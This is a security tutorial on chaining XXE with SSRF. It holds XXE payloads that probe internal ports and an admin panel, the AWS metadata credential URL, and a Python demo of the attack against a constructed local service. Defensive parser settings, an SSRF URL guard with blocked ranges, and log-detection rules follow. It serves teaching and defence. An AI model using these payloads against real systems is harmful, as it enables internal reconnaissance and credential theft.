Understanding SSRF in an XXE Context
Individual vulnerabilities become far more dangerous when they are chained together. Server-Side Request Forgery (SSRF) and XML External Entity (XXE) injection are one such combination: an XXE flaw gives an attacker a way to make the server issue requests, and because those requests originate inside the network they can reach internal services, exfiltrate sensitive data and compromise backend systems that perimeter defenses never expose.
Key Points
- SSRF manipulates servers into making unauthorized requests to internal or external systems through unvalidated user input
- XXE exploits misconfigured XML parsers to read local files, make HTTP requests and, in rare parser configurations, execute code
- Combined attacks enable internal network reconnaissance, data theft, and lateral movement across systems
- Both vulnerabilities are preventable through proper input validation, secure parser configuration, and network segmentation
- Cloud metadata services (AWS, Azure, GCP) are prime targets for SSRF+XXE exploitation
What is Server-Side Request Forgery (SSRF)?
SSRF vulnerabilities occur when applications process user-supplied URLs or endpoints without proper validation, allowing attackers to force the server to make requests on their behalf.
Common Attack Scenarios:
- Querying internal databases or admin panels not exposed to the internet
- Accessing cloud metadata services to steal temporary credentials
- Port scanning internal networks to map infrastructure
- Bypassing IP-based access controls and firewalls
Real-World Example: An attacker submits `http://169.254.169.254/latest/meta-data/iam/security-credentials/` to a vulnerable image processing service, forcing it to retrieve AWS credentials from the instance metadata service. This works against IMDSv1; IMDSv2 requires a session token obtained with a PUT request first, which a plain GET-based SSRF cannot perform, so requiring IMDSv2 on the instance is itself a mitigation.
What is XML External Entity (XXE) Processing?
XXE vulnerabilities exploit weakly configured XML parsers by injecting external entity declarations into XML input. When the parser resolves such an entity, it fetches the file or URL the declaration names and splices the result into the document, so the attacker controls what the server reads and where it connects.
Attack Capabilities:
- File Disclosure: Read local files like `/etc/passwd` or configuration files
- Remote Requests: Force the server to make HTTP/HTTPS requests
- Denial of Service: Trigger resource exhaustion through recursive entity expansion (the "billion laughs" attack)
- Code Execution: In rare cases with specific parser configurations, such as PHP's `expect://` stream wrapper when the expect extension is loaded
Security Note: XXE appeared as its own category (A4) in the 2017 OWASP Top 10 and was folded into A05 Security Misconfiguration in the 2021 edition, reflecting that it remains widespread and is usually a parser-configuration problem. Many legacy systems remain vulnerable because their XML parsers still resolve external entities by default.
The Combined Threat: SSRF via XXE
When XXE and SSRF are chained together, attackers gain a powerful reconnaissance and exploitation toolkit that operates from within the trusted server environment.
Attack Advantages:
- Bypass firewall rules that block external attackers
- Access internal services that trust requests by network origin (localhost or a private address) instead of authenticating them
- Enumerate network topology and identify vulnerable services
- Pivot to additional systems using discovered credentials
Attack Methodology
Step 1: Crafting the XXE Payload
Attackers inject malicious XML containing external entity declarations that force the server to make requests:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://localhost:§PORT§/" >
]>
<contact>
<name>&xxe;</name>
<email>attacker@example.com</email>
<message>Test payload</message>
</contact>
The SYSTEM keyword instructs the XML parser to fetch content from the specified URL. The §PORT§ marker is Burp Intruder's payload-position syntax and shows where each port number is substituted during automated scanning. The DOCTYPE names `foo` while the root element is `contact`; a non-validating parser does not care about the mismatch. Note that the fetched content is only visible in-band if the application echoes the `name` value back; otherwise the attacker relies on error messages, response timing or an out-of-band channel.
Step 2: Automated Network Reconnaissance
Using tools like Burp Suite Intruder, attackers automate internal port scanning:
| Step | Action | Tool/Technique |
|---|---|---|
| Intercept | Capture the XML request through a proxy | Burp Proxy |
| Configure | Mark the port number as a payload position | Burp Intruder |
| Fuzz | Test sequential port numbers (1-65535) | Payload lists |
| Analyze | Sort responses by length or status code to identify open ports | Burp Intruder results table; Burp Comparer for diffing two responses |
| Exploit | Target discovered services with refined payloads | Custom XXE |
Detection Technique: Responses for open ports typically differ from those for closed ports in length, status code, error message or timing (a refused connection fails immediately, while a filtered port tends to time out), so sorting Intruder results by length or response time surfaces them.
Step 3: Exploiting Discovered Services
Once an open port is identified (e.g., port 81 running an admin interface), attackers refine their payload:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://localhost:81/admin" >
]>
<contact>
<name>&xxe;</name>
<email>attacker@example.com</email>
<message>Access granted</message>
</contact>
Potential Outcomes:
- Unauthorized access to administrative interfaces
- Exposure of internal API endpoints and documentation
- Retrieval of database connection strings or credentials
- Further exploitation when combined with additional vulnerabilities
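The three steps above, and the parser hardening the Defense Strategies section calls for, reproduced in-process as an added example. This is not code from the original article: it uses Python's standard-library `xml.sax` (expat) as the vulnerable parser, and the loopback HTTP server, its port and its response body are constructed stand-ins for an internal admin interface. A probe against the server's port comes back "open" with the page content, a probe against a port nothing listens on comes back "closed" with a connection error, and the hardened configuration refuses the DOCTYPE before any request is made.

```python
# Added example, not from the original page: SSRF through XXE reproduced
# in-process with Python's xml.sax (expat). FakeAdminPanel is constructed.
import io
import socket
import threading
import xml.sax
import xml.sax.handler
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_payload(url):
    """The page's contact-form payload with the SYSTEM URL filled in."""
    return (f'<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "{url}" >]>'
            "<contact><name>&xxe;</name><email>attacker@example.com</email>"
            "<message>Test payload</message></contact>").encode()


class _NameCollector(xml.sax.handler.ContentHandler):
    """Collects the text of <name>, i.e. whatever &xxe; expanded to."""
    def __init__(self):
        super().__init__()
        self.inside, self.text = False, []
    def startElement(self, tag, attrs):
        self.inside = tag == "name"
    def endElement(self, tag):
        self.inside = False
    def characters(self, data):
        if self.inside:
            self.text.append(data)


class _RejectDoctype:
    """Lexical handler refusing any DOCTYPE (xml.sax's counterpart to Xerces'
    disallow-doctype-decl); the no-op methods complete the interface."""
    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE is not allowed in untrusted XML")
    def endDTD(self): pass
    def comment(self, content): pass
    def startCDATA(self): pass
    def endCDATA(self): pass


def parse(xml_bytes, resolve_external=False):
    """Parse untrusted XML and return the text of <name>.
    resolve_external=True is the legacy, vulnerable setting: expat hands each
    SYSTEM URL to urllib and splices the fetched bytes into the document.
    False (Python's default since 3.7.1) leaves external entities unresolved,
    and rejecting the DOCTYPE closes the door entirely."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external)
    if not resolve_external:
        parser.setProperty(xml.sax.handler.property_lexical_handler, _RejectDoctype())
    handler = _NameCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.text).strip()


def probe(url):
    """One XXE probe as the attacker sees it: ("open", body) if the entity
    resolved, ("closed", error name) if the connection failed. The two cases
    differ in content, length and error, which is what the Intruder step sorts on."""
    try:
        return "open", parse(build_payload(url), resolve_external=True)
    except (xml.sax.SAXException, OSError) as exc:  # URLError is an OSError
        return "closed", type(exc).__name__


class FakeAdminPanel(BaseHTTPRequestHandler):
    """Constructed internal service that trusts anything from localhost."""
    seen = []
    def do_GET(self):
        self.seen.append(self.path)
        body = b"internal admin panel: build 4.2, db=pg://db.internal:5432/app"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
    def log_message(self, *args):
        pass  # keep the demo quiet


def start_internal_service():
    """Serve the fake admin panel on an ephemeral loopback port; return the port."""
    server = HTTPServer(("127.0.0.1", 0), FakeAdminPanel)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address[1]


def closed_port():
    """A loopback port nothing listens on, so the connect is refused."""
    with socket.socket() as sock:
        sock.bind(("127.0.0.1", 0))
        return sock.getsockname()[1]


if __name__ == "__main__":
    port = start_internal_service()
    print(probe(f"http://127.0.0.1:{port}/admin"))
    print(probe(f"http://127.0.0.1:{closed_port()}/"))
    try:
        parse(build_payload(f"http://127.0.0.1:{port}/admin"))
    except ValueError as exc:
        print("hardened parser:", exc)
```

Run it with an actual internal service in place of `FakeAdminPanel` and the difference between the two `probe` results is exactly what an Intruder run over §PORT§ sorts on. The hardened path raises before the entity is ever declared, so the server's `seen` list stays untouched; that is the property to assert in a regression test for your own parser configuration.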
Defense Strategies
For Development Teams
Disable XXE Processing:
- Configure XML parsers to reject external entities entirely
- Use secure parser settings (e.g., `XMLConstants.FEATURE_SECURE_PROCESSING` in Java), but note that this feature alone does not disable external entity resolution in every JAXP implementation; the explicit parser features shown in the code example are what actually close XXE
- Implement strict allowlists for XML input validation
- Consider using JSON instead of XML when possible
Prevent SSRF Attacks:
- Validate and sanitize all user-supplied URLs
- Implement allowlists for permitted domains and IP ranges
- Block requests to private, loopback and link-local ranges (`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`, `127.0.0.0/8`, `169.254.0.0/16`, which contains the cloud metadata address, and their IPv6 counterparts `::1`, `fc00::/7`, `fe80::/10`). Apply the check to the address the hostname actually resolves to, and connect to that address rather than re-resolving the name, otherwise DNS rebinding and HTTP redirects walk around the filter
- Disable unnecessary URL schemes (e.g., `file://`, `gopher://`, `dict://`)
- Use network segmentation to isolate sensitive internal services
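The SSRF checks listed above as one request-time guard, written here as an added example (not code from the original article). It validates the scheme, rejects embedded credentials, resolves the host, checks every returned address against the blocked ranges and hands back the single vetted IP the caller should connect to. `static_resolver`, the host names `cdn.example` and `internal.corp`, and the addresses in the table are constructed so the guard can be exercised offline; in production the default `socket.getaddrinfo` resolver is used.

```python
# Added example, not from the original page: a request-time guard for
# user-supplied URLs. static_resolver and the host table are constructed.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# The page's private ranges plus the others SSRF payloads reach for: "this
# host", CGNAT, link-local (where the cloud metadata address lives),
# multicast/reserved, and the IPv6 counterparts.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8")]


def is_blocked_ip(ip):
    """True if the address lands in a range the server must never fetch from."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:10.0.0.1 is 10.0.0.1 in disguise
    return any(addr in net for net in BLOCKED_NETWORKS)


def static_resolver(table):
    """Constructed stand-in for socket.getaddrinfo over a fixed host->IP
    table, same call shape, so the guard can be exercised without DNS."""
    def resolver(host, port, family=0, type=0, proto=0, flags=0):
        if host not in table:
            raise socket.gaierror(f"constructed resolver: unknown host {host!r}")
        return [(None, None, None, "", (table[host], port))]
    return resolver


def check_outbound_url(url, resolver=socket.getaddrinfo, allowed_hosts=None):
    """Decide whether the server may fetch `url` on a user's behalf.

    Returns (True, ip) with the vetted address the caller must connect to
    (connecting to the IP instead of re-resolving the name defeats DNS
    rebinding), or (False, reason). Every resolved address is checked, so a
    name that answers with one public and one internal address is refused.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, f"host {host!r} not on allowlist"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    try:
        # Literal addresses skip DNS. Anything else, including decimal or hex
        # spellings such as 2130706433, goes through the resolver, and it is
        # the resolver's answer that gets checked, not the attacker's text.
        ipaddress.ip_address(host)
        addrs = [host]
    except ValueError:
        try:
            addrs = sorted({info[4][0] for info in resolver(host, port, type=socket.SOCK_STREAM)})
        except socket.gaierror:
            return False, f"{host!r} does not resolve"
    if not addrs:
        return False, f"{host!r} does not resolve"
    for addr in addrs:
        if is_blocked_ip(addr):
            return False, f"{host!r} resolves to blocked address {addr}"
    return True, addrs[0]


if __name__ == "__main__":
    resolve = static_resolver({"cdn.example": "93.184.216.34", "internal.corp": "10.0.0.5"})
    for url in ("https://cdn.example/avatar.png", "http://internal.corp/",
                "http://169.254.169.254/latest/meta-data/", "http://[::ffff:127.0.0.1]:81/admin",
                "file:///etc/passwd", "gopher://127.0.0.1:6379/_SET"):
        print(url, "->", check_outbound_url(url, resolver=resolve))
```

The guard is only half the control: the HTTP client that follows must connect to the returned IP with the original `Host` header, and must either refuse redirects or run each redirect target back through `check_outbound_url`, since a public host that 302s to `http://169.254.169.254/` is the standard way around a pre-request check.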
Code Example (Java):
import javax.xml.parsers.DocumentBuilderFactory;

// setFeature throws the checked ParserConfigurationException; handle it at the call site
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // stops XXE and entity-expansion DoS outright
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false); // belt and braces if a DOCTYPE must be accepted
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
For Security Teams
Monitoring and Detection:
- Alert on outbound requests to localhost, private IPs, or cloud metadata endpoints
- Log XML parsing errors and suspicious entity declarations
- Monitor for unusual patterns in application logs (e.g., `<!DOCTYPE` or `<!ENTITY ... SYSTEM` declarations in request bodies)
- Implement rate limiting on XML processing endpoints
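The first three monitoring items, turned into detection logic and run over constructed log lines, as an added example (not code from the original article). Both the egress-proxy and application log formats, the timestamps, addresses and request bodies are invented for the demonstration; the rules are the point. An egress record whose destination is loopback, private or link-local (which covers `169.254.169.254`) raises an alert, and an application record whose body carries an entity declaration raises one, with a second alert when the declared SYSTEM URL uses a non-HTTP scheme or points at an internal host.

```python
# Added example, not from the original page: detection rules for XXE and
# SSRF indicators, run over constructed log lines. Formats are invented.
import ipaddress
import re
from urllib.parse import urlsplit

SAMPLE_LOG = r"""
2024-05-02T10:14:01Z kind=egress src=10.10.4.12 dst=93.184.216.34 dport=443 path=/avatar.png
2024-05-02T10:14:02Z kind=app method=POST path=/api/contact body="<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://localhost:81/\">]><contact><name>&xxe;</name></contact>"
2024-05-02T10:14:03Z kind=egress src=10.10.4.12 dst=169.254.169.254 dport=80 path=/latest/meta-data/iam/security-credentials/
2024-05-02T10:14:04Z kind=app method=POST path=/api/contact body="<contact><name>alice</name></contact>"
2024-05-02T10:14:05Z kind=egress src=10.10.4.12 dst=127.0.0.1 dport=81 path=/admin
2024-05-02T10:14:06Z kind=app method=POST path=/api/contact body="<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><contact><name>&xxe;</name></contact>"
""".strip()

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
DECL_RE = re.compile(r"<!DOCTYPE\b|<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.I)
SYSTEM_URL_RE = re.compile(r'SYSTEM\s+"([^"]+)"', re.I)
LOCAL_NAMES = {"localhost", "metadata.google.internal", "metadata"}


def parse_line(line):
    """Split 'timestamp key=value ...' into a dict; quoted values are unescaped."""
    ts, _, rest = line.partition(" ")
    fields = {k: (v[1:-1].replace('\\"', '"') if v.startswith('"') else v)
              for k, v in KV_RE.findall(rest)}
    fields["ts"] = ts
    return fields


def is_internal_destination(dst):
    """Loopback, private, link-local (incl. the metadata address) or a well-known local name."""
    if dst.lower() in LOCAL_NAMES:
        return True
    try:
        ip = ipaddress.ip_address(dst)
    except ValueError:
        return False
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified


def scan_log(log_text):
    """Return (timestamp, rule, detail) alerts for every matching record."""
    alerts = []
    for line in log_text.splitlines():
        f = parse_line(line)
        if f.get("kind") == "egress" and is_internal_destination(f.get("dst", "")):
            alerts.append((f["ts"], "internal-egress", f"{f['dst']}:{f.get('dport')}{f.get('path', '')}"))
        body = f.get("body", "")
        if f.get("kind") == "app" and DECL_RE.search(body):
            alerts.append((f["ts"], "xxe-entity-declaration", f.get("path")))
            for url in SYSTEM_URL_RE.findall(body):
                parts = urlsplit(url)
                if parts.scheme not in ("http", "https"):
                    alerts.append((f["ts"], "xxe-dangerous-scheme", url))
                elif is_internal_destination(parts.hostname or ""):
                    alerts.append((f["ts"], "xxe-internal-target", url))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(*alert)
```

Over the sample this yields two `internal-egress` alerts, two `xxe-entity-declaration` alerts, one `xxe-internal-target` for the `localhost:81` probe and one `xxe-dangerous-scheme` for the `file://` read, and nothing for the benign avatar fetch or the plain contact form. Because the application may be a legitimate client of some internal services, tune `internal-egress` with an allowlist of expected destinations per source; the `xxe-*` rules, by contrast, should fire on any untrusted endpoint, since a request body has no business carrying a DOCTYPE.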
Regular Security Assessments:
- Conduct penetration testing focused on XXE and SSRF vulnerabilities
- Use automated scanners (OWASP ZAP, Burp Scanner) in CI/CD pipelines
- Review XML parser configurations across all applications
- Test with known malicious payloads from public repositories
Real-World Impact
Case Study: The best-documented public instance of this pattern is the 2019 Capital One breach, in which an SSRF flaw in an AWS-hosted application was used to query the instance metadata service; the temporary IAM credentials it returned were then used to read customer data from S3. That incident involved SSRF alone rather than an XXE chain, but the impact is the same whichever bug supplies the server-side request.
High-Value Targets:
- Cloud Environments: AWS, Azure, and GCP metadata services at `169.254.169.254`. Note that Azure and GCP require a custom request header (`Metadata: true` and `Metadata-Flavor: Google` respectively) and AWS IMDSv2 requires a token obtained with a PUT, none of which an XXE-driven GET can supply; AWS IMDSv1, and any internal service that demands no header, is directly reachable this way
- Internal APIs: Microservices and REST endpoints not exposed externally
- Legacy Systems: Applications using outdated XML parsers without security patches
- Container Orchestration: Kubernetes API servers and Docker daemons
- Database Interfaces: Internal database management tools and admin panels
Financial Impact: Organizations affected by SSRF+XXE attacks face costs including incident response, regulatory fines, customer notification, and reputational damage, which for a serious breach can run into millions of dollars.
Testing Tools and Resources
Security Testing Tools
| Tool | Purpose | Use Case |
|---|---|---|
| Burp Suite | Intercept and modify HTTP requests | Manual XXE/SSRF testing and automation |
| OWASP ZAP | Automated vulnerability scanning | CI/CD integration and baseline scanning |
| XXEinjector | Specialized XXE exploitation | Advanced file retrieval and OOB testing |
| Metasploit | Comprehensive exploitation framework | Post-exploitation and lateral movement |
| SSRFmap | SSRF exploitation automation | Cloud metadata extraction and port scanning |
Payload Resources
- [PayloadBox XXE Injection Payloads](https://github.com/payloadbox/xxe-injection-payload